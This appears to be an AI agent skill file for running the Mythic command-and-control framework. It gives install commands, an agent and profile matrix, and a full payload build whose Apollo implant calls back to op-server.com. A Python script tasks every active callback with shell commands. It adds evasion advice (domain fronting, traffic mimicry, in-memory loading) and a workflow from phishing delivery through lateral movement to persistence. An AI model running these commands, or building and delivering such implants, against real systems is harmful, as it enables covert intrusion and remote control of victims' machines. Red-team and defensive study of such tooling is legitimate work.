| name | c2-mythic |
| description | Mythic C2 framework operations — multi-agent (Apfell, Apollo, Athena, Poseidon, Medusa), web UI on 7443, RabbitMQ + PostgreSQL backend, JSON-RPC tasking model, building an agent via mythic-cli, profile design (HTTP/SMB/named pipe/peer-to-peer), opsec defaults. Comparison to Sliver: more pluggable, less polished UI. |
| allowed-tools | Bash Read Write |
| metadata | {"when_to_use":"mythic c2 apollo apfell poseidon athena medusa command and control agent payload tasking opsec mythic-cli","subdomain":"c2","tags":"c2, mythic, post-exploitation","mitre_attack":"T1071, T1105, T1057"} |
Mythic C2 Operator Skill
Mythic (cody-thomas/Mythic) is a containerized, multi-agent C2 framework. Strengths: pluggable agents (~10+ official), good for cross-platform engagements, JSON-RPC tasking model is scriptable.
Setup (one-time, on the operator server)
git clone https://github.com/its-a-feature/Mythic
cd Mythic
sudo ./install_docker_ubuntu.sh
sudo ./mythic-cli start
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo
sudo ./mythic-cli install github https://github.com/MythicAgents/Poseidon
sudo ./mythic-cli install github https://github.com/MythicAgents/Medusa
sudo ./mythic-cli install github https://github.com/MythicAgents/Athena
Agent matrix
| Agent | Platform | Lang | Best for |
|---|
| Apollo | Windows | C# / .NET Framework 3.5+ | Windows-heavy engagements, .NET interop |
| Poseidon | macOS, Linux | Go | Cross-platform, single static binary |
| Athena | Windows / macOS / Linux | .NET 6/7/8 | Modern .NET, AOT-compiled |
| Apfell | macOS | JavaScript for Automation (JXA) | Native macOS execution via osascript |
| Medusa | any | Python | Quick prototypes, fileless |
| Service Wrapper | Windows | C++ | Persistence via Windows service |
Profile matrix
Profiles = the comms channel. An agent can use one or more profiles.
| Profile | Transport | Detection |
|---|
| http | Plain HTTP(S) with configurable headers, paths, jitter, sleep | Easiest to fingerprint; use behind redirector + domain fronting |
| websocket | WS / WSS | Long-lived; suspicious from desktop |
| smb | Named pipe over SMB | Peer-to-peer between Apollo agents — no internet needed for inner workstations |
| dns | DNS TXT / A queries to attacker NS | Slow, but bypasses every HTTP-only firewall |
| peer-to-peer (SMB) | One agent forwards another's traffic | Use for deep network — only one egress point needed |
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/websocket
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/dns
Build a payload (Apollo + http profile)
sudo ./mythic-cli payload create \
--name "stage1" \
--description "Apollo http to op-server.com" \
--agent Apollo \
--c2_profile http \
--c2_profile_parameter callback_host=https://op-server.com \
--c2_profile_parameter callback_port=443 \
--c2_profile_parameter encrypted_exchange_check=T \
--c2_profile_parameter callback_interval=30 \
--c2_profile_parameter callback_jitter=20 \
--c2_profile_parameter killdate=2025-12-31 \
--build_parameter version=net4.0 \
--output_file stage1.exe
Tasking from the operator
Mythic provides:
- Web UI (callback view → click + task)
mythic-cli scripting (Python wrapper)
- Direct GraphQL API at
https://<host>:7443/v1/graphql
python3 -c '
from mythic import mythic, mythic_classes, mythic_utilities, mythic_callbacks
import asyncio
async def main():
m = await mythic.login(server_ip="op-server.com", username="op", password="pw")
cbs = await mythic_callbacks.get_all_active_callbacks(mythic=m)
for cb in cbs:
await mythic_callbacks.issue_task(mythic=m, command_name="shell", parameters="whoami", callback_display_id=cb.display_id)
asyncio.run(main())
'
OPSEC defaults
- Profile encryption: HTTP profile uses encrypted_exchange_check by default — key derived via Diffie-Hellman after the initial connect. Don't disable.
- Sleep / jitter: default 30s/20% is loud. Production engagements: 5-minute sleeps, 25% jitter, weekly killdate.
- Callback host: NEVER call back to a bare attacker IP. Use a domain on a CDN (CloudFront, Cloudflare), preferably with domain fronting.
- Build customization: Apollo's build config supports custom headers, paths, useragent — match the target's expected traffic pattern (Slack workspace? Use Slack-like headers).
- Module loading: prefer in-memory module loading (Apollo's
load command) over dropping new files on disk.
Common workflow
1. Set up Mythic + profiles + agents (1 hr, one-time per engagement)
2. Stage redirector with HTTPS cert (CloudFront, nginx, ...)
3. Build payload(s) per target (1 per OS/objective)
4. Deliver via phish / exploit / pretext
5. On callback: 'whoami', 'hostname', 'pwd', 'ps' — basic survey
6. Network enumeration (token mimic, find-domain-controllers, etc.)
7. Lateral via SMB profile to peers — no new HTTP callbacks
8. Persistence after objective met
9. Clean up; teardown
Comparison vs Sliver / Cobalt Strike / Havoc
| Mythic | Sliver | Cobalt Strike | Havoc |
|---|
| License | OSS BSD | OSS GPL | $$$ commercial | OSS GPL |
| Agent maturity | Excellent for .NET (Apollo) | Excellent Go single binary | Best-in-class | Improving fast |
| UI | Good web | Web + CLI | Heavy Java client | Modern web |
| Detection | Newer = less fingerprinted | Mid | Heavily detected | Newer |
| Multi-agent | Yes (10+) | Single agent | Single (beacon + ext) | Single |
| Best for | Cross-platform, scripted ops | Single-binary speed | Mature OPSEC | Modern web UI |
References
- Mythic docs — docs.mythic-c2.net
- Cody Thomas's "Introducing Mythic" blog series
- MythicAgents GitHub org — every official agent
- "OPSEC for Modern C2 Frameworks" — RTO recordings